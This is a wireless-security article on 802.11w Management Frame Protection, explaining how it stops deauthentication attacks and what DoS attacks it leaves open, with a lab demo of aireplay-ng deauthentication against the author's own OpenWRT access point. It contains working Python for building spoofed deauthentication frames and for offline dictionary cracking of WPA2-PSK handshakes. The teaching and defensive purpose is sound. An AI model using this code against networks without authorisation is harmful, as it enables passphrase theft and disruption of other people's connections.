Management Frame Protection and its limitations

In this article we look at management frames, their exposure to Denial of Service (DoS) through the de-authentication attack, how Management Frame Protection prevents that attack, and its limitations against other DoS attacks that security researchers have discovered over the years.

A brief overview of Management Frames


Management frames are at the centre of WLAN operation and play an important role in the negotiation between an access point and its stations.

Code (Wireshark filter: wlan.fc.type_subtype)   Subtype
0x00                                             Association Request
0x01                                             Association Response
0x02                                             Re-Association Request
0x03                                             Re-Association Response
0x04                                             Probe Request
0x05                                             Probe Response
0x06                                             Reserved
0x07                                             Reserved
0x08                                             Beacon
0x09                                             ATIM
0x0a                                             Disassociation
0x0b                                             Authentication
0x0c                                             Deauthentication
0x0d                                             Action
0x0e                                             Reserved
0x0f                                             Reserved
Management frame subtypes (frame type 0, so the Wireshark type/subtype code equals the subtype value)
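As an added example (not code from the original article), the following Python parser decodes the Frame Control field of an 802.11 frame, names the management subtype using the same codes as the table, and extracts the reason code from a Disassociation or Deauthentication frame. The MAC addresses and the deauth frame it builds are constructed for the demo; the frame layout mirrors the unprotected deauthentication that tools such as aireplay-ng inject.

```python
import struct

# Subtype codes for management frames (frame type 0), as in the table above
MGMT_SUBTYPES = {
    0x0: "Association Request",    0x1: "Association Response",
    0x2: "Re-Association Request", 0x3: "Re-Association Response",
    0x4: "Probe Request",          0x5: "Probe Response",
    0x6: "Reserved",               0x7: "Reserved",
    0x8: "Beacon",                 0x9: "ATIM",
    0xA: "Disassociation",         0xB: "Authentication",
    0xC: "Deauthentication",       0xD: "Action",
    0xE: "Reserved",               0xF: "Reserved",
}
FRAME_TYPES = {0: "Management", 1: "Control", 2: "Data", 3: "Extension"}


def parse_frame_control(fc):
    """Decode the 2-byte Frame Control field.
    Byte 0: bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype.
    Byte 1: flags; bit 6 is the Protected Frame bit, which an MFP-protected
    deauth/disassoc sets (its body is then CCMP-encrypted)."""
    b0, b1 = fc[0], fc[1]
    ftype = (b0 >> 2) & 0x3
    subtype = (b0 >> 4) & 0xF
    return {
        "version": b0 & 0x3,
        "type": ftype,
        "subtype": subtype,
        "protected": bool(b1 & 0x40),
        # Wireshark's wlan.fc.type_subtype is (type << 4) | subtype
        "type_subtype": (ftype << 4) | subtype,
    }


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def describe_mgmt_frame(frame):
    """Parse a management frame: 24-byte MAC header, then the frame body."""
    fc = parse_frame_control(frame[0:2])
    if fc["type"] != 0:
        raise ValueError(f"not a management frame (type {FRAME_TYPES[fc['type']]})")
    info = {
        "subtype": MGMT_SUBTYPES[fc["subtype"]],
        "wireshark_filter": f"wlan.fc.type_subtype == 0x{fc['type_subtype']:02x}",
        "protected": fc["protected"],
        "da": mac_str(frame[4:10]),        # Address 1: destination
        "sa": mac_str(frame[10:16]),       # Address 2: source
        "bssid": mac_str(frame[16:22]),    # Address 3: BSSID
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,  # high 12 bits
    }
    # Disassociation and Deauthentication bodies start with a 2-byte reason code
    if fc["subtype"] in (0xA, 0xC):
        info["reason_code"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def deauth_frame(da, sa, bssid, reason=7):
    """Build an unprotected Deauthentication frame (FC 0xc000); reason 7 is
    'class 3 frame received from nonassociated STA', the code aireplay-ng uses."""
    return (b"\xc0\x00" + b"\x3a\x01"           # frame control, duration
            + da + sa + bssid + b"\x00\x00"     # addresses, sequence control
            + struct.pack("<H", reason))


# Constructed addresses for the demo (locally administered, not real devices)
DEMO_BSSID = bytes.fromhex("02aa00000001")
DEMO_STA = bytes.fromhex("02bb00000002")


def demo():
    # Spoof the AP (sa = bssid) telling the station it is deauthenticated
    return describe_mgmt_frame(deauth_frame(DEMO_STA, DEMO_BSSID, DEMO_BSSID))


if __name__ == "__main__":
    print(demo())
```

Feeding a real capture into `describe_mgmt_frame` (for example the raw bytes of a frame exported from Wireshark, radiotap header removed) shows the same fields the screenshots below display; a protected deauth from an MFP-enabled AP will have `protected` set and the reason code unreadable without the session key.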

A station that wants to join the network must successfully complete the probe, authentication and association phases.
In WPA2, after association, the client and the AP perform the 4-way handshake to derive the Pairwise Transient Key (PTK) that encrypts the traffic for the rest of the session.

From an offensive point of view, control over management frames means being able to eavesdrop on and forge them with the aim of disrupting the operation of APs and wireless stations.

Management Frame Protection


Management Frame Protection (MFP) is a security feature designed to protect some types of management frames exchanged between client stations (STA) and the Access Point (AP).

The 802.11w amendment introduced Management Frame Protection to prevent forgery (and, for unicast frames, eavesdropping) of otherwise spoofable packets by a malicious AP or station.
However, 802.11w protects only disassociation, de-authentication and robust Action frames: unicast ones are encrypted with the pairwise cipher, broadcast ones are integrity-protected with BIP using a group key (the IGTK) delivered during the handshake. Frames exchanged before the 4-way handshake (beacons, probe, authentication and association frames) cannot be protected because no key exists yet. To cover that gap, an MFP-capable AP that receives an unprotected (re)association request for an already associated station does not drop the station but starts an SA Query exchange, so a forged association request cannot be used to evict it either.

Therefore, the main purpose of MFP is to mitigate Denial of Service attacks against already connected stations.

Protected Management Frames VS De-authentication attacks


Protected Management Frames (when supported by both the AP and its clients) are a convenient way to prevent the de-authentication attack, which is the most common MAC-layer attack.

De-authenticating a client is also of interest because it forces the client to reconnect, which lets the attacker capture the 4-way handshake. The handshake does not carry the Pairwise Master Key (PMK) or the passphrase in any form: what it exposes are the two nonces, the two MAC addresses and a MIC computed with a key derived from the PMK. That is enough for an offline attack: for each candidate passphrase the attacker derives the PMK (PBKDF2 of passphrase and SSID), derives the PTK from it, and checks whether it reproduces the captured MIC; a match reveals the plaintext passphrase.
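The following Python script, added here as an example and not taken from the original article, shows end to end why a captured handshake is sufficient: it implements the WPA2-PSK key derivation (PBKDF2 for the PMK, PRF-512 for the PTK, HMAC-SHA1-128 for the EAPOL MIC) and runs a dictionary attack against a handshake message 2. The "capture" is constructed inside the script from a made-up passphrase, MAC addresses and nonces (the SSID is the one from the demo below), so it runs offline; the real M2 also carries the station's RSN IE as key data, which is omitted here.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    The first 16 bytes are the KCK, the key that authenticates EAPOL messages."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(5):  # 5 x 20 bytes of HMAC-SHA1, truncated to 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


# Offset of the 16-byte MIC inside an EAPOL-Key frame:
# 4-byte EAPOL header + descriptor type(1) + key info(2) + key length(2)
# + replay counter(8) + nonce(32) + key IV(16) + RSC(8) + key ID(8) = 81
MIC_OFFSET = 81


def eapol_mic(kck, eapol):
    """WPA2 (AKM 00-0F-AC:2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck, snonce, replay_counter=1):
    """Minimal EAPOL-Key message 2 (station -> AP) with a valid MIC."""
    key = (b"\x02"                                   # descriptor type: RSN
           + (0x010A).to_bytes(2, "big")             # key info: MIC, pairwise, HMAC-SHA1
           + (16).to_bytes(2, "big")                 # key length (CCMP)
           + replay_counter.to_bytes(8, "big")
           + snonce
           + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, RSC, key ID
           + b"\x00" * 16                            # MIC placeholder
           + (0).to_bytes(2, "big"))                 # key data length (RSN IE omitted)
    eapol = b"\x02\x03" + len(key).to_bytes(2, "big") + key  # version 2, type EAPOL-Key
    mic = eapol_mic(kck, eapol)
    return eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_m2, wordlist):
    """Offline attack: derive PMK/PTK per candidate and compare the MIC."""
    captured_mic = eapol_m2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_m2), captured_mic):
            return candidate
    return None


# Constructed "capture": SSID from the demo, made-up MACs, nonces and passphrase
SSID = "GL-AR750-444"
AA = bytes.fromhex("02aa00000001")      # authenticator (AP) address
SPA = bytes.fromhex("02bb00000002")     # supplicant (station) address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
SECRET = "cloud-anchor-88"


def make_capture():
    """What the attacker would sniff after a forced reconnection: message 2."""
    pmk = pmk_from_passphrase(SECRET, SSID)
    kck = ptk_from_pmk(pmk, AA, SPA, ANONCE, SNONCE)[:16]
    return build_msg2(kck, SNONCE)


def demo(wordlist=("password", "12345678", SECRET, "hunter22")):
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, make_capture(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each candidate costs 4096 HMAC-SHA1 iterations, which is exactly the work that aircrack-ng or hashcat parallelises; the point is that nothing in the exchange has to be decrypted, only re-derived and compared.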

Demo


It is time for a test.
In this demo we consider an AP with SSID GL-AR750-444 to which two stations (a Windows 10 laptop and an Android 8.0 phone) are connected.
After putting the TL-WN722M into monitor mode, we can fire up airodump-ng to see what kind of traffic is nearby.


With airodump-ng we identify the target of the test

Now we try to de-authenticate the Windows laptop with the aireplay-ng tool.

With Wireshark we see that the station is being deauthenticated repeatedly by the attacker

As we can see, the deauth attack succeeds: the Windows client is kicked off and keeps trying to reconnect to the AP.

Now we want to verify that Management Frame Protection (MFP) prevents this Denial of Service. For that purpose we edit the /etc/config/wireless file of the OpenWRT router and add `option ieee80211w '2'` to the wifi-iface section, which means that MFP is required.

Value 2 for 'ieee80211w' in the /etc/config/wireless file makes MFP mandatory for every client

To test this mitigation, we try to de-authenticate the Windows client again, this time without success.

Now the station is not disconnected by aireplay packets anymore

However, the 'required' value only admits stations that support Management Frame Protection. The Android 8.0 phone used in this test does not support it and failed to connect to the AP.

Therefore, where legacy clients still have to connect, setting 'optional' (value '1') is the recommended compromise, keeping in mind that those clients stay unprotected.
Let's use this option in the /etc/config/wireless file of the OpenWRT router.

Below, we see from the packets captured with Wireshark that both the Windows client (Intel integrated Wi-Fi adapter) and the AP advertise the 'optional' flavour of Management Frame Protection (MFP capable, but not required).

Wireless packet showing the flag MFP for the windows client

Wireless packet showing the flag MFP for the Access Point

Now, with 'optional' set on the AP, we try to de-authenticate all the stations connected to it.
What we see is that the Windows client is not affected by the deauth frames, while the Android phone keeps getting disconnected.

Only the Android phone is deauthenticated, because it does not support Management Frame Protection
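The MFP flags visible in the Wireshark screenshots live in the RSN Capabilities field of the RSN information element: bit 7 is "Management Frame Protection Capable" (MFPC) and bit 6 is "Management Frame Protection Required" (MFPR). As an added example (not code from the article or from OpenWRT/hostapd), the Python below builds the RSN IE that hostapd advertises for each ieee80211w value, parses it back, and applies the 802.11w association rules to reproduce the three outcomes seen in the demo: Android rejected under 'required', Android connected but unprotected under 'optional', Windows protected under 'optional'. The cipher/AKM layout (CCMP + PSK, BIP-CMAC-128 as group management cipher when MFP is on) is the common WPA2-PSK case and is assumed here.

```python
# OUI 00-0F-AC suite selectors from IEEE 802.11
SUITE_CCMP = b"\x00\x0f\xac\x04"
SUITE_BIP_CMAC_128 = b"\x00\x0f\xac\x06"   # group management cipher for MFP
AKM_PSK = b"\x00\x0f\xac\x02"
RSN_TAG = 48

MFPR = 0x0040   # RSN Capabilities bit 6: Management Frame Protection Required
MFPC = 0x0080   # RSN Capabilities bit 7: Management Frame Protection Capable


def build_rsn_ie(ieee80211w):
    """RSN IE as advertised for OpenWRT's 'option ieee80211w' 0 / 1 / 2
    (none / optional / required) on a WPA2-PSK CCMP network."""
    caps = {0: 0, 1: MFPC, 2: MFPC | MFPR}[ieee80211w]
    body = ((1).to_bytes(2, "little")                  # version 1
            + SUITE_CCMP                               # group cipher
            + (1).to_bytes(2, "little") + SUITE_CCMP   # pairwise cipher list
            + (1).to_bytes(2, "little") + AKM_PSK      # AKM list
            + caps.to_bytes(2, "little"))              # RSN capabilities
    if ieee80211w:
        # with MFP on, a PMKID count of 0 and the group management cipher follow
        body += (0).to_bytes(2, "little") + SUITE_BIP_CMAC_128
    return bytes([RSN_TAG, len(body)]) + body


def parse_rsn_ie(ie):
    """Decode an RSN IE (tag 48) and extract the MFP flags Wireshark displays."""
    if ie[0] != RSN_TAG:
        raise ValueError("not an RSN IE")
    body = ie[2:2 + ie[1]]
    pos = 2                                             # skip version
    group = body[pos:pos + 4]; pos += 4
    n = int.from_bytes(body[pos:pos + 2], "little"); pos += 2
    pairwise = [body[pos + 4 * i:pos + 4 * i + 4] for i in range(n)]; pos += 4 * n
    n = int.from_bytes(body[pos:pos + 2], "little"); pos += 2
    akms = [body[pos + 4 * i:pos + 4 * i + 4] for i in range(n)]; pos += 4 * n
    caps = 0                                            # capabilities are optional
    if pos + 2 <= len(body):
        caps = int.from_bytes(body[pos:pos + 2], "little"); pos += 2
    group_mgmt = None
    if pos + 2 <= len(body):                            # PMKID count, then PMKIDs
        n = int.from_bytes(body[pos:pos + 2], "little"); pos += 2 + 16 * n
        if pos + 4 <= len(body):
            group_mgmt = body[pos:pos + 4]
    return {
        "group": group, "pairwise": pairwise, "akm": akms,
        "mfpc": bool(caps & MFPC), "mfpr": bool(caps & MFPR),
        "group_mgmt_cipher": "BIP-CMAC-128" if group_mgmt == SUITE_BIP_CMAC_128 else group_mgmt,
    }


def negotiate(ap, sta):
    """Outcome of an association attempt under the 802.11w rules."""
    if ap["mfpr"] and not sta["mfpc"]:
        return "rejected"      # AP refuses the non-MFP station (the Android case)
    if sta["mfpr"] and not ap["mfpc"]:
        return "rejected"      # a station that requires MFP will not join a legacy AP
    if ap["mfpc"] and sta["mfpc"]:
        return "protected"     # deauth/disassoc now need the session key
    return "unprotected"       # connected, but still vulnerable to aireplay-ng


def demo():
    """Reproduce the demo: Windows advertises MFP optional, Android has no MFP."""
    windows = parse_rsn_ie(build_rsn_ie(1))
    android = parse_rsn_ie(build_rsn_ie(0))
    return {
        ap_setting: {"windows": negotiate(parse_rsn_ie(build_rsn_ie(ap_setting)), windows),
                     "android": negotiate(parse_rsn_ie(build_rsn_ie(ap_setting)), android)}
        for ap_setting in (0, 1, 2)
    }


if __name__ == "__main__":
    for setting, result in demo().items():
        print(f"ieee80211w={setting}: {result}")
```

The same parser can be pointed at a beacon's tagged parameters from a real capture to audit which nearby networks advertise MFPC at all; an AP whose RSN IE has neither bit set is exactly the "recent router" the conclusion complains about.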


Some words on the limitations of Management Frame Protection

Ok, Protected Management Frames are what we need to deploy in our WPA2-Personal or WPA2-Enterprise infrastructures.
But there are many other attacks that achieve the same DoS effect, and some of them are far more powerful:
  1. RF jamming does not abuse the 802.11 standard (as the de-auth attack does): it simply floods the channels on which the wireless stations operate with continuous noise. This noise heavily disrupts the operation of wireless networks and no protocol feature can stop it.
  2. Bugs in drivers/firmware that lead to DoS or possibly to RCE.
  3. Security researchers have identified many other DoS attacks that are not mitigated by the 802.11w amendment. The abstracts are impressive and I really suggest reading these two papers:
     - "Channel Switch and Quiet attack: New DoS attacks exploiting the 802.11 standard" (Bastian Könings, Florian Schaub, Frank Kargl, and Stefan Dietzel) - 2009
     - "Denial-of-service attacks against the 4-way handshake" (Mathy Vanhoef and Frank Piessens) - 2017 | Note: Mathy Vanhoef is also the author of KRACK :-).


Conclusion

Management Frame Protection is a feature that should have been deployed since its introduction (2009), but it is still missing from many recent routers.
However, even with this protection in place, multiple DoS techniques remain that achieve the same goal as the most common de-authentication attack.
